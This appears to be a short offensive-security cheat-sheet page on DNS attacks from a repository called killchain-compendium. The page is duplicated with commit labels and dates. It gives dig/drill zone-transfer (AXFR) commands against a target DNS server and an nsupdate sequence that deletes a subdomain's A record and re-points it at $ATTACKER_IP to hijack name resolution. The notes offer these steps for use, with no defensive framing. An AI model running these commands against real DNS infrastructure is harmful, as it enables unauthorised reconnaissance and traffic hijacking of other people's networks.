killchain-compendium/enumeration/docs/dns.md

# DNS

## Subdomain Enumeration

* Get all the info via 
```sh
dig     @$TARGET_DNS $DOMAIN axfr
drill   @$TARGET_DNS $DOMAIN axfr
```

* [subrake](https://github.com/hash3liZer/Subrake.git)


## Join a Domain

* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk 
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup
bump 2022-03-19 23:39:17 +01:00			`# DNS`

			`## Subdomain Enumeration`

			`* Get all the info via`
			```sh
			`dig @$TARGET_DNS $DOMAIN axfr`
			`drill @$TARGET_DNS $DOMAIN axfr`
			```

			`* [subrake](https://github.com/hash3liZer/Subrake.git)`
bookmarks 2022-08-03 00:30:03 +02:00

			`## Join a Domain`

			`* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk`
			```sh
			`nsupdate`
			`server <DNS-IP>`
			`update delete <sub.domain.com>`
			`update add <sub.domain.com> 1234 A $ATTACKER_IP`
			`send`
			`quit`
			```
			`* Check domain by querying the subdomain's A record via dig/drill/nslookup`